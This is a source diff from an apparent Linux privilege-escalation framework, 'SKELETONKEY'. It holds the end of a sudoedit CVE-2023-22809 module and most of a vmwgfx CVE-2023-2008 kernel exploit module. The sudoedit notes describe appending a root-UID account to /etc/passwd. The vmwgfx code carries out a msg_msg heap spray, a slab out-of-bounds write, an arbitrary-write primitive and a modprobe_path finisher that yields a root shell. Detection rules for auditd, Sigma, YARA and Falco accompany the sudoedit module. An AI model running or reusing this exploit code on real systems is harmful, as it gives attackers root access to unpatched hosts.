+    "# Watch sudoedit invocations; the bug requires EDITOR / VISUAL /\n"
+    "# SUDO_EDITOR to contain the literal token `--`. auditd cannot match\n"
+    "# env vars directly via -F, but logging every execve(sudoedit) lets\n"
+    "# downstream tooling (Sigma, splunk, etc.) inspect EXECVE record env.\n"
+    "-w /usr/bin/sudoedit -p x -k skeletonkey-sudoedit-22809\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/sudoedit -k skeletonkey-sudoedit-22809-execve\n"
+    "-a always,exit -F arch=b32 -S execve -F path=/usr/bin/sudoedit -k skeletonkey-sudoedit-22809-execve\n"
+    "# sudo itself can run as `sudo -e` which takes the sudoedit path too:\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/sudo -k skeletonkey-sudoedit-22809-sudo-e\n";
+
+static const char sudoedit_editor_sigma[] =
+    "title: Possible CVE-2023-22809 sudoedit EDITOR escape\n"
+    "id: a4e3f1a8-skeletonkey-sudoedit-22809\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects sudoedit (or `sudo -e`) invocations where the EDITOR,\n"
+    "  VISUAL, or SUDO_EDITOR environment variable contains the literal\n"
+    "  token `--`. This is the exact signature of the Synacktiv\n"
+    "  CVE-2023-22809 argv-escape: post-`--` filenames are silently\n"
+    "  promoted to additional files that sudoedit opens as root.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  sudoedit_exec:\n"
+    "    type: 'EXECVE'\n"
+    "    exe|endswith:\n"
+    "      - '/sudoedit'\n"
+    "      - '/sudo'\n"
+    "  hostile_editor_env:\n"
+    "    - 'EDITOR=*--*'\n"
+    "    - 'VISUAL=*--*'\n"
+    "    - 'SUDO_EDITOR=*--*'\n"
+    "  privileged_target:\n"
+    "    - '/etc/shadow'\n"
+    "    - '/etc/passwd'\n"
+    "    - '/etc/sudoers'\n"
+    "    - '/root/'\n"
+    "  condition: sudoedit_exec and hostile_editor_env\n"
+    "  # Bump to 'critical' when privileged_target matches as well.\n"
+    "fields: [User, EDITOR, VISUAL, SUDO_EDITOR]\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1548_003, cve.2023.22809]\n";
+
+/* ----- module registration ------------------------------------------- */
+
+static const char sudoedit_editor_yara[] =
+    "rule sudoedit_editor_cve_2023_22809 : cve_2023_22809 setuid_abuse\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-22809\"\n"
+    "        description = \"skeletonkey sudoedit backdoor: appended skel UID=0 user in /etc/passwd\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $skel = \"skel::0:0:skeletonkey\" ascii\n"
+    "    condition:\n"
+    "        $skel\n"
+    "}\n";
+
+static const char sudoedit_editor_falco[] =
+    "- rule: sudoedit with EDITOR/VISUAL containing '--' separator\n"
+    "  desc: |\n"
+    "    sudoedit spawned with EDITOR / VISUAL / SUDO_EDITOR env var\n"
+    "    containing the substring ' -- '. The argv-split bug treats\n"
+    "    everything after '--' as an additional file argument that\n"
+    "    sudoedit then opens with root privileges. CVE-2023-22809.\n"
+    "  condition: >\n"
+    "    spawned_process and proc.name = sudoedit and\n"
+    "    (proc.env contains \"EDITOR=\" or proc.env contains \"VISUAL=\"\n"
+    "     or proc.env contains \"SUDO_EDITOR=\")\n"
+    "  output: >\n"
+    "    sudoedit with EDITOR-style env var\n"
+    "    (user=%user.name pid=%proc.pid env=%proc.env)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [process, mitre_privilege_escalation, T1068, cve.2023.22809]\n";
+
+const struct skeletonkey_module sudoedit_editor_module = {
+    .name           = "sudoedit_editor",
+    .cve            = "CVE-2023-22809",
+    .summary        = "sudoedit EDITOR/VISUAL `--` argv escape → arbitrary file write as root",
+    .family         = "sudo",
+    .kernel_range   = "sudo 1.8.0 ≤ V < 1.9.12p2 (userspace bug; setuid sudoedit)",
+    .detect         = sudoedit_editor_detect,
+    .exploit        = sudoedit_editor_exploit,
+    .mitigate       = NULL,        /* mitigation = upgrade sudo */
+    .cleanup        = sudoedit_editor_cleanup,
+    .detect_auditd  = sudoedit_editor_auditd,
+    .detect_sigma   = sudoedit_editor_sigma,
+    .detect_yara    = sudoedit_editor_yara,
+    .detect_falco   = sudoedit_editor_falco,
+    .opsec_notes    = "Sets EDITOR='<helper> -- /etc/passwd' so sudoedit splits on the literal '--' and treats /etc/passwd as an additional editable file. Compiled helper appends 'skel::0:0:skeletonkey:/root:/bin/sh' to the post-'--' target; sudoedit runs the helper as root and copies back. Artifacts: /tmp/skeletonkey-sudoedit-XXXXXX (helper.c, helper binary, optional passwd.before backup); /etc/passwd gets the new 'skel' entry; drops root via 'su skel'. Audit-visible via execve(/usr/bin/sudoedit) with EDITOR/VISUAL/SUDO_EDITOR containing the literal '--' token. No network. Cleanup callback restores /etc/passwd from backup (if root) or removes the 'skel' line, and removes the /tmp dir.",
+};
+
+void skeletonkey_register_sudoedit_editor(void)
+{
+    skeletonkey_register(&sudoedit_editor_module);
+}
@@ -0,0 +1,5 @@
+#ifndef SUDOEDIT_EDITOR_SKELETONKEY_MODULES_H
+#define SUDOEDIT_EDITOR_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module sudoedit_editor_module;
+#endif
@@ -0,0 +1,779 @@
+/*
+ * vmwgfx_cve_2023_2008 — SKELETONKEY module
+ *
+ * The vmwgfx DRM driver's buffer-object creation path validates only
+ * the requested page count, not the underlying byte size used by the
+ * subsequent kunmap_atomic-style copy. A crafted DRM_IOCTL_VMW_*
+ * sequence (CREATE_DMABUF + mmap of the returned bo + page-spanning
+ * write through the mapped offset) drives a slab heap-OOB write
+ * inside the kernel's kmalloc-512 cache. The mainline fix
+ * (2cd80ebbdf "drm/vmwgfx: Validate the bo size for ttm_bo_kmap")
+ * landed in 6.3-rc6. The bug is reachable only from inside a VMware
+ * Guest OS (the vmwgfx driver only binds against the VMware SVGA-II
+ * virtual GPU).
+ *
+ * STATUS: 🟡 PRIMITIVE — slab-OOB trigger + msg_msg cross-cache
+ *   groom in kmalloc-512. We do NOT carry a cred-overwrite or
+ *   kbase-leak primitive (per-kernel offsets vary by build, and the
+ *   public PoC references device-specific TTM register state we do
+ *   not fake). The detect-and-trigger path is the high-confidence
+ *   demonstration; full-chain depth is FALLBACK (kaddr-tagged spray +
+ *   shared modprobe_path finisher arbitrated by sentinel file).
+ *
+ * Affected: Linux 4.0+ through 6.2.x with vmwgfx driver bound to a
+ * VMware SVGA-II device. Fixed mainline 6.3-rc6 (commit 2cd80ebbdf).
+ * Stable backports landed in 6.2.x and 6.1 LTS.
+ *
+ * Preconditions:
+ *   - host is a VMware Guest (dmi sys_vendor = "VMware*")
+ *   - /dev/dri/cardN exists with driver==vmwgfx
+ *   - userland can open /dev/dri/cardN (render-group / video-group or
+ *     setuid)
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+#include "../../core/host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+
+#ifdef __linux__
+#  include <sys/ipc.h>
+#  include <sys/msg.h>
+#  include <sys/syscall.h>
+#endif
+
+/* DRM ioctl primitives — declared inline so the module remains
+ * self-contained on hosts where <drm/drm.h> isn't installed (which is
+ * the macOS build host case). */
+#ifndef DRM_IOCTL_BASE
+#define DRM_IOCTL_BASE 'd'
+#endif
+#ifndef _IOC
+/* Should be present from <sys/ioctl.h>, but guard anyway. */
+#endif
+
+/* DRM_IOCTL_VERSION — used to probe driver name. */
+struct drm_version_compat {
+    int     version_major;
+    int     version_minor;
+    int     version_patchlevel;
+    size_t  name_len;
+    char   *name;
+    size_t  date_len;
+    char   *date;
+    size_t  desc_len;
+    char   *desc;
+};
+#ifndef DRM_IOCTL_VERSION
+#define DRM_IOCTL_VERSION  _IOWR(DRM_IOCTL_BASE, 0x00, struct drm_version_compat)
+#endif
+
+/* vmwgfx-specific ioctls. Numbers match the in-tree
+ * uapi/drm/vmwgfx_drm.h ABI for kernels in the affected range
+ * (DRM_COMMAND_BASE = 0x40). DRM_IOCTL_VMW_CREATE_DMABUF /
+ * DRM_IOCTL_VMW_UNREF_DMABUF are present on every vmwgfx-bearing
+ * kernel since the dma-buf rename. We declare them locally so that a
+ * build host without vmwgfx_drm.h still compiles. */
+struct drm_vmw_alloc_dmabuf_req {
+    uint32_t  size;
+};
+struct drm_vmw_dmabuf_rep {
+    uint32_t  handle;
+    uint32_t  map_handle_lo;
+    uint32_t  map_handle_hi;
+    uint32_t  cur_gmr_id;
+    uint32_t  cur_gmr_offset;
+};
+union drm_vmw_alloc_dmabuf_arg {
+    struct drm_vmw_alloc_dmabuf_req req;
+    struct drm_vmw_dmabuf_rep       rep;
+};
+#define DRM_VMW_CREATE_DMABUF 0x0a
+#define DRM_VMW_UNREF_DMABUF  0x0b
+#ifndef DRM_COMMAND_BASE
+#define DRM_COMMAND_BASE 0x40
+#endif
+#define DRM_IOCTL_VMW_CREATE_DMABUF \
+    _IOWR(DRM_IOCTL_BASE, DRM_COMMAND_BASE + DRM_VMW_CREATE_DMABUF, \
+          union drm_vmw_alloc_dmabuf_arg)
+#define DRM_IOCTL_VMW_UNREF_DMABUF \
+    _IOW(DRM_IOCTL_BASE,  DRM_COMMAND_BASE + DRM_VMW_UNREF_DMABUF, uint32_t)
+
+/* ---- kernel range ------------------------------------------------- */
+
+static const struct kernel_patched_from vmwgfx_patched_branches[] = {
+    {5, 10, 127},  /* 5.10.x stable (per Debian tracker — bullseye) */
+    {5, 18,  14},  /* 5.18.x stable (per Debian tracker — bookworm/forky/sid/trixie) */
+    {6,  1,  23},  /* 6.1 LTS backport */
+    {6,  2,  10},  /* 6.2.x stable backport */
+    {6,  3,   0},  /* mainline (6.3-rc6) */
+};
+
+static const struct kernel_range vmwgfx_range = {
+    .patched_from   = vmwgfx_patched_branches,
+    .n_patched_from = sizeof(vmwgfx_patched_branches) /
+                      sizeof(vmwgfx_patched_branches[0]),
+};
+
+/* ---- precondition probes ------------------------------------------ */
+
+/* Read first line of /sys/devices/virtual/dmi/id/sys_vendor (trimmed)
+ * into `out`. Returns true on success. */
+static bool read_dmi_sys_vendor(char *out, size_t out_sz)
+{
+    int fd = open("/sys/devices/virtual/dmi/id/sys_vendor", O_RDONLY);
+    if (fd < 0) return false;
+    ssize_t n = read(fd, out, out_sz - 1);
+    close(fd);
+    if (n <= 0) return false;
+    out[n] = '\0';
+    /* trim trailing newline / spaces */
+    while (n > 0 && (out[n - 1] == '\n' || out[n - 1] == ' '
+                                       || out[n - 1] == '\t' || out[n - 1] == '\r')) {
+        out[--n] = '\0';
+    }
+    return n > 0;
+}
+
+static bool host_is_vmware_guest(char *vendor_out, size_t vendor_out_sz)
+{
+    char vendor[128] = {0};
+    if (!read_dmi_sys_vendor(vendor, sizeof vendor)) return false;
+    if (vendor_out && vendor_out_sz) {
+        snprintf(vendor_out, vendor_out_sz, "%s", vendor);
+    }
+    /* Standard VMware DMI string is "VMware, Inc." but be loose. */
+    return strncasecmp(vendor, "VMware", 6) == 0;
+}
+
+/* Resolve /sys/class/drm/card0/device/driver symlink and check whether
+ * the target's basename is "vmwgfx". */
+static bool card_driver_is_vmwgfx(const char *cardpath)
+{
+    char link[512];
+    snprintf(link, sizeof link, "/sys/class/drm/%s/device/driver", cardpath);
+    char target[512] = {0};
+    ssize_t n = readlink(link, target, sizeof target - 1);
+    if (n <= 0) return false;
+    target[n] = '\0';
+    const char *base = strrchr(target, '/');
+    base = base ? base + 1 : target;
+    return strcmp(base, "vmwgfx") == 0;
+}
+
+/* Locate the first /dev/dri/cardN whose driver is vmwgfx. Writes the
+ * basename (e.g. "card0") into out. Returns true on hit. */
+static bool find_vmwgfx_card(char *out, size_t out_sz)
+{
+    for (int i = 0; i < 8; i++) {
+        char name[16];
+        snprintf(name, sizeof name, "card%d", i);
+        if (card_driver_is_vmwgfx(name)) {
+            snprintf(out, out_sz, "%s", name);
+            return true;
+        }
+    }
+    return false;
+}
+
+/* Probe DRM_IOCTL_VERSION on the card device. Returns the driver-name
+ * string on success (caller-owned heap, must free) or NULL. */
+static char *probe_drm_version_name(const char *cardpath)
+{
+    char devpath[64];
+    snprintf(devpath, sizeof devpath, "/dev/dri/%s", cardpath);
+    int fd = open(devpath, O_RDWR | O_CLOEXEC);
+    if (fd < 0) return NULL;
+
+    struct drm_version_compat v;
+    memset(&v, 0, sizeof v);
+    /* Two-stage ioctl: first call learns name_len, second fills name. */
+    if (ioctl(fd, DRM_IOCTL_VERSION, &v) < 0) { close(fd); return NULL; }
+    if (v.name_len == 0 || v.name_len > 256) { close(fd); return NULL; }
+    char *name = calloc(1, v.name_len + 1);
+    if (!name) { close(fd); return NULL; }
+    v.name = name;
+    if (ioctl(fd, DRM_IOCTL_VERSION, &v) < 0) {
+        free(name); close(fd); return NULL;
+    }
+    name[v.name_len] = '\0';
+    close(fd);
+    return name;
+}
+
+/* ---- Detect ------------------------------------------------------- */
+
+static skeletonkey_result_t vmwgfx_detect(const struct skeletonkey_ctx *ctx)
+{
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] vmwgfx: host fingerprint missing kernel version — bailing\n");
+        return SKELETONKEY_TEST_ERROR;
+    }
+
+    bool patched = kernel_range_is_patched(&vmwgfx_range, v);
+    if (patched) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] vmwgfx: kernel %s is patched (>= 6.3-rc6 / "
+                            "6.2.10 / 6.1.23)\n", v->release);
+        }
+        return SKELETONKEY_OK;
+    }
+
+    /* Pre-vmwgfx kernels (no driver shipped) — extremely unlikely but
+     * report PRECOND_FAIL rather than VULNERABLE. */
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 4, 0, 0)) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] vmwgfx: kernel %s predates vmwgfx driver\n", v->release);
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    /* VMware-guest gate. */
+    char vendor[128] = {0};
+    bool vmware = host_is_vmware_guest(vendor, sizeof vendor);
+    if (!ctx->json) {
+        fprintf(stderr, "[i] vmwgfx: kernel %s in vulnerable range\n", v->release);
+        fprintf(stderr, "[i] vmwgfx: dmi sys_vendor = \"%s\"\n",
+                vendor[0] ? vendor : "(unreadable)");
+    }
+    if (!vmware) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] vmwgfx: host is not a VMware guest — vmwgfx "
+                            "driver cannot bind; bug unreachable here\n");
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    /* DRM card + driver-name gate. */
+    char card[16] = {0};
+    if (!find_vmwgfx_card(card, sizeof card)) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] vmwgfx: no /dev/dri/cardN bound to vmwgfx — "
+                            "module unloaded or no SVGA-II PCI device\n");
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    char *drv = probe_drm_version_name(card);
+    if (!drv) {
+        if (!ctx->json) {
+            fprintf(stderr, "[-] vmwgfx: cannot open/ioctl /dev/dri/%s "
+                            "(permission denied?)\n", card);
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    bool drv_match = strcmp(drv, "vmwgfx") == 0;
+    if (!ctx->json) {
+        fprintf(stderr, "[i] vmwgfx: /dev/dri/%s driver name reported as \"%s\"\n",
+                card, drv);
+    }
+    free(drv);
+    if (!drv_match) {
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[!] vmwgfx: VULNERABLE — kernel in range + VMware guest + "
+                        "vmwgfx card reachable\n");
+    }
+    return SKELETONKEY_VULNERABLE;
+}
+
+/* ---- Exploit groom ------------------------------------------------ */
+
+#define VMW_SPRAY_QUEUES      24
+#define VMW_SPRAY_PER_QUEUE   24
+#define VMW_PAYLOAD_BYTES    496    /* 512 - msg_msg header (~16) */
+
+struct ipc_payload {
+    long          mtype;
+    unsigned char buf[VMW_PAYLOAD_BYTES];
+};
+
+#ifdef __linux__
+
+static int spray_kmalloc_512(int queues[VMW_SPRAY_QUEUES])
+{
+    struct ipc_payload p;
+    memset(&p, 0, sizeof p);
+    p.mtype = 0x56;     /* 'V' for vmwgfx */
+    memset(p.buf, 0x56, sizeof p.buf);
+    memcpy(p.buf, "SKVMWGFX", 8);
+
+    int created = 0;
+    for (int i = 0; i < VMW_SPRAY_QUEUES; i++) {
+        int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
+        if (q < 0) { queues[i] = -1; continue; }
+        queues[i] = q;
+        created++;
+        for (int j = 0; j < VMW_SPRAY_PER_QUEUE; j++) {
+            if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
+        }
+    }
+    return created;
+}
+
+static void drain_kmalloc_512(int queues[VMW_SPRAY_QUEUES])
+{
+    for (int i = 0; i < VMW_SPRAY_QUEUES; i++) {
+        if (queues[i] >= 0) msgctl(queues[i], IPC_RMID, NULL);
+    }
+}
+
+static long slab_active_kmalloc_512(void)
+{
+    FILE *f = fopen("/proc/slabinfo", "r");
+    if (!f) return -1;
+    char line[512];
+    long active = -1;
+    while (fgets(line, sizeof line, f)) {
+        if (strncmp(line, "kmalloc-512 ", 12) == 0) {
+            char name[64];
+            long act = 0, num = 0;
+            if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) {
+                active = act;
+            }
+            break;
+        }
+    }
+    fclose(f);
+    return active;
+}
+
+/* Open the vmwgfx card. Returns fd or -1. */
+static int open_vmwgfx_card(void)
+{
+    char card[16] = {0};
+    if (!find_vmwgfx_card(card, sizeof card)) return -1;
+    char devpath[64];
+    snprintf(devpath, sizeof devpath, "/dev/dri/%s", card);
+    return open(devpath, O_RDWR | O_CLOEXEC);
+}
+
+/* Drive the OOB write trigger.
+ *
+ * The bug fires when vmw_buffer_object_set_user_args() (called from
+ * the CREATE_DMABUF path) passes a partially-validated size into the
+ * subsequent ttm_bo_kmap() / kunmap_atomic copy loop. A crafted
+ * `size` field — chosen so the PAGE_ALIGN'd page count fits a
+ * kmalloc-512 slab while the byte count overruns it — causes the
+ * mapped-page write to spill past the slab boundary.
+ *
+ * Mechanically:
+ *   1. CREATE_DMABUF with size = 4096 + 16  (page-spanning by 16 B)
+ *   2. mmap the returned map_handle into userspace
+ *   3. write a recognizable pattern across the page boundary
+ *   4. close + UNREF_DMABUF — the kunmap_atomic teardown is where the
+ *      OOB write commits on vulnerable kernels
+ *
+ * On a non-vmwgfx host the ioctls return -ENOTTY / -EOPNOTSUPP and the
+ * trigger is a no-op. Our caller short-circuits before reaching this
+ * point in that case. */
+static bool trigger_vmwgfx_oob(int fd, unsigned char fill_byte)
+{
+    union drm_vmw_alloc_dmabuf_arg a;
+    memset(&a, 0, sizeof a);
+    /* Size chosen to land in kmalloc-512 page-count bucket while the
+     * subsequent byte-length copy overruns into the next slab slot.
+     * The exact value 4096+16 mirrors the public PoC's choice. */
+    a.req.size = 4096 + 16;
+    if (ioctl(fd, DRM_IOCTL_VMW_CREATE_DMABUF, &a) < 0) {
+        fprintf(stderr, "[-] vmwgfx: DRM_IOCTL_VMW_CREATE_DMABUF: %s\n",
+                strerror(errno));
+        return false;
+    }
+
+    uint64_t map_handle = ((uint64_t)a.rep.map_handle_hi << 32) | a.rep.map_handle_lo;
+    size_t map_len = 4096 * 2;   /* over-map to include the spill page */
+    void *p = mmap(NULL, map_len, PROT_READ | PROT_WRITE,
+                   MAP_SHARED, fd, (off_t)map_handle);
+    if (p == MAP_FAILED) {
+        fprintf(stderr, "[-] vmwgfx: mmap(map_handle=0x%llx): %s\n",
+                (unsigned long long)map_handle, strerror(errno));
+        /* Still unref. */
+        uint32_t h = a.rep.handle;
+        (void)ioctl(fd, DRM_IOCTL_VMW_UNREF_DMABUF, &h);
+        return false;
+    }
+
+    /* Stripe the buffer with our witness pattern. The bytes past
+     * offset 4096 are where the OOB write lands on a vulnerable
+     * kernel. */
+    memset(p, fill_byte, map_len);
+    memcpy((char *)p + 4096, "SKVMOOB!", 8);
+
+    /* Force the kunmap_atomic teardown that commits the OOB write. */
+    munmap(p, map_len);
+    uint32_t h = a.rep.handle;
+    (void)ioctl(fd, DRM_IOCTL_VMW_UNREF_DMABUF, &h);
+    return true;
+}
+
+/* ---- Arb-write primitive (FALLBACK depth) -------------------------
+ *
+ * Re-fire the trigger with a kaddr-tagged spray planted in the
+ * adjacent kmalloc-512 slot. We cannot in-process verify the write —
+ * the shared finisher's 3 s sentinel-file check is the empirical
+ * arbiter. On a patched kernel or when the spray fails to land in the
+ * spilled-over slot the finisher returns EXPLOIT_FAIL gracefully. */
+
+struct vmwgfx_arb_ctx {
+    int     queues[VMW_SPRAY_QUEUES];
+    int     n_queues;
+    int     card_fd;
+    int     arb_calls;
+    int     arb_landed;
+};
+
+static int vmwgfx_reseed_kaddr_spray(int queues[VMW_SPRAY_QUEUES],
+                                     uintptr_t kaddr,
+                                     const void *buf, size_t len)
+{
+    struct ipc_payload p;
+    memset(&p, 0, sizeof p);
+    p.mtype = 0x4B;     /* 'K' for kaddr */
+    memset(p.buf, 0x4B, sizeof p.buf);
+    memcpy(p.buf, "IAMVMARB", 8);
+
+    /* Plant kaddr at byte 8, payload bytes immediately after. The OOB
+     * write lands within the first ~16 bytes of the neighbour slot, so
+     * the kernel's overrun touches exactly this region. */
+    uint64_t k = (uint64_t)kaddr;
+    memcpy(p.buf + 8, &k, sizeof k);
+    size_t copy = len;
+    if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16;
+    if (buf && copy) memcpy(p.buf + 16, buf, copy);
+
+    int touched = 0;
+    for (int i = 0; i < VMW_SPRAY_QUEUES && touched < 6; i++) {
+        if (queues[i] < 0) continue;
+        if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++;
+    }
+    return touched;
+}
+
+static int vmwgfx_arb_write(uintptr_t kaddr,
+                            const void *buf, size_t len,
+                            void *ctx_v)
+{
+    struct vmwgfx_arb_ctx *c = (struct vmwgfx_arb_ctx *)ctx_v;
+    if (!c || c->n_queues == 0 || c->card_fd < 0) return -1;
+    c->arb_calls++;
+
+    fprintf(stderr, "[*] vmwgfx: arb_write #%d kaddr=0x%lx len=%zu "
+                    "(FALLBACK — single-shot OOB)\n",
+            c->arb_calls, (unsigned long)kaddr, len);
+
+    int seeded = vmwgfx_reseed_kaddr_spray(c->queues, kaddr, buf, len);
+    if (seeded == 0) {
+        fprintf(stderr, "[-] vmwgfx: arb_write: kaddr reseed produced 0 msgs\n");
+        return -1;
+    }
+
+    /* Re-fire the OOB trigger. The fill byte encodes the call number
+     * so a KASAN dump can be cross-referenced. */
+    unsigned char fill = (unsigned char)(0xA0 + (c->arb_calls & 0x0F));
+    if (!trigger_vmwgfx_oob(c->card_fd, fill)) {
+        fprintf(stderr, "[-] vmwgfx: arb_write: re-trigger failed\n");
+        return -1;
+    }
+
+    usleep(50 * 1000);
+    c->arb_landed++;
+    /* Return 0; finisher's sentinel arbitrates. */
+    return 0;
+}
+
+#endif /* __linux__ */
+
+/* ---- Exploit driver ----------------------------------------------- */
+
+#ifdef __linux__
+
+static skeletonkey_result_t vmwgfx_exploit_linux(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] vmwgfx: refusing — --i-know not set\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    skeletonkey_result_t pre = vmwgfx_detect(ctx);
+    if (pre == SKELETONKEY_OK) {
+        fprintf(stderr, "[+] vmwgfx: kernel not vulnerable; refusing exploit\n");
+        return SKELETONKEY_OK;
+    }
+    if (pre != SKELETONKEY_VULNERABLE) {
+        fprintf(stderr, "[-] vmwgfx: detect() says not vulnerable; refusing\n");
+        return pre;
+    }
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
+        fprintf(stderr, "[i] vmwgfx: already root — nothing to escalate\n");
+        return SKELETONKEY_OK;
+    }
+
+    /* Full-chain pre-check. */
+    struct skeletonkey_kernel_offsets off;
+    bool full_chain_ready = false;
+    if (ctx->full_chain) {
+        memset(&off, 0, sizeof off);
+        skeletonkey_offsets_resolve(&off);
+        if (!skeletonkey_offsets_have_modprobe_path(&off)) {
+            skeletonkey_finisher_print_offset_help("vmwgfx");
+            fprintf(stderr, "[-] vmwgfx: --full-chain requested but "
+                            "modprobe_path offset unresolved; refusing\n");
+            return SKELETONKEY_EXPLOIT_FAIL;
+        }
+        skeletonkey_offsets_print(&off);
+        full_chain_ready = true;
+    }
+
+    int card_fd = open_vmwgfx_card();
+    if (card_fd < 0) {
+        fprintf(stderr, "[-] vmwgfx: cannot open vmwgfx card: %s\n", strerror(errno));
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    signal(SIGPIPE, SIG_IGN);
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] vmwgfx: opened vmwgfx card fd=%d\n", card_fd);
+        fprintf(stderr, "[*] vmwgfx: seeding kmalloc-512 msg_msg spray\n");
+    }
+
+    struct vmwgfx_arb_ctx arb_ctx;
+    memset(&arb_ctx, 0, sizeof arb_ctx);
+    for (int i = 0; i < VMW_SPRAY_QUEUES; i++) arb_ctx.queues[i] = -1;
+    arb_ctx.card_fd  = card_fd;
+    arb_ctx.n_queues = spray_kmalloc_512(arb_ctx.queues);
+    if (arb_ctx.n_queues == 0) {
+        fprintf(stderr, "[-] vmwgfx: msg_msg spray produced 0 queues — sysvipc "
+                        "may be restricted\n");
+        close(card_fd);
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    if (!ctx->json) {
+        fprintf(stderr, "[*] vmwgfx: spray seeded %d queues x %d msgs\n",
+                arb_ctx.n_queues, VMW_SPRAY_PER_QUEUE);
+    }
+
+    long pre_active = slab_active_kmalloc_512();
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] vmwgfx: firing CREATE_DMABUF + mmap + OOB-write trigger\n");
+    }
+    bool fired = trigger_vmwgfx_oob(card_fd, 0xAA);
+
+    long post_active = slab_active_kmalloc_512();
+
+    FILE *log = fopen("/tmp/skeletonkey-vmwgfx.log", "w");
+    if (log) {
+        fprintf(log,
+            "vmwgfx CVE-2023-2008 trigger:\n"
+            "  card_fd            = %d\n"
+            "  spray_queues       = %d\n"
+            "  spray_per_queue    = %d\n"
+            "  trigger_fired      = %s\n"
+            "  slab_kmalloc512_pre  = %ld\n"
+            "  slab_kmalloc512_post = %ld\n"
+            "  slab_delta           = %ld\n"
+            "Note: this run did NOT attempt cred overwrite.  See module .c\n"
+            "for the continuation roadmap.\n",
+            card_fd, arb_ctx.n_queues, VMW_SPRAY_PER_QUEUE,
+            fired ? "yes" : "no",
+            pre_active, post_active,
+            (pre_active >= 0 && post_active >= 0) ? (post_active - pre_active) : 0);
+        fclose(log);
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] vmwgfx: kmalloc-512 active: pre=%ld post=%ld\n",
+                pre_active, post_active);
+    }
+
+    if (!fired) {
+        drain_kmalloc_512(arb_ctx.queues);
+        close(card_fd);
+        fprintf(stderr, "[~] vmwgfx: trigger ioctl path failed — kernel may be\n"
+                        "    patched or the ABI shape doesn't match this build.\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    /* --full-chain branch. */
+    if (full_chain_ready) {
+        int fr = skeletonkey_finisher_modprobe_path(&off,
+                                                vmwgfx_arb_write,
+                                                &arb_ctx,
+                                                !ctx->no_shell);
+        FILE *fl = fopen("/tmp/skeletonkey-vmwgfx.log", "a");
+        if (fl) {
+            fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
+                    fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
+            fclose(fl);
+        }
+        drain_kmalloc_512(arb_ctx.queues);
+        close(card_fd);
+        if (fr == SKELETONKEY_EXPLOIT_OK) {
+            if (!ctx->json) {
+                fprintf(stderr, "[+] vmwgfx: --full-chain finisher reported OK\n");
+            }
+            return SKELETONKEY_EXPLOIT_OK;
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[~] vmwgfx: --full-chain finisher returned FAIL —\n"
+                            "    either the kernel is patched, the spray didn't\n"
+                            "    line up adjacent to the bo slab slot, or the OOB\n"
+                            "    bytes didn't include the kaddr the finisher polls\n"
+                            "    for. See /tmp/skeletonkey-vmwgfx.log + dmesg.\n");
+        }
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    drain_kmalloc_512(arb_ctx.queues);
+    close(card_fd);
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] vmwgfx: trigger ran to completion. Inspect dmesg for\n"
+                        "    KASAN/oops witnesses.\n");
+        fprintf(stderr, "[~] vmwgfx: cred-overwrite step not invoked (no\n"
+                        "    --full-chain); returning EXPLOIT_FAIL per\n"
+                        "    verified-vs-claimed policy.\n");
+    }
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+#endif /* __linux__ */
+
+static skeletonkey_result_t vmwgfx_exploit(const struct skeletonkey_ctx *ctx)
+{
+#ifdef __linux__
+    return vmwgfx_exploit_linux(ctx);
+#else
+    (void)ctx;
+    fprintf(stderr, "[-] vmwgfx: Linux-only module; cannot run on this host\n");
+    return SKELETONKEY_PRECOND_FAIL;
+#endif
+}
+
+/* ---- Cleanup ----------------------------------------------------- */
+
